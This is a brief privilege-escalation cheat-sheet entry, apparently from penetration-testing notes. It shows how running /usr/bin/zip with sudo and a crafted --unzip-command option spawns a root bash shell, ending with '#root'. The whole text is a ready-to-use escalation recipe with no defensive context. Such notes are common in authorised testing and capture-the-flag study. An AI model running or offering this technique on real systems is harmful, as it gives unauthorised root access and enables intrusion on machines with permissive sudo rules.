/usr/bin/zip

cd /tmp
1)touch a file โ†’ touch test.txt

2) sudo zip 1.zip test.txt -T --unzip-command="sh -c /bin/bash"

#root

Last updated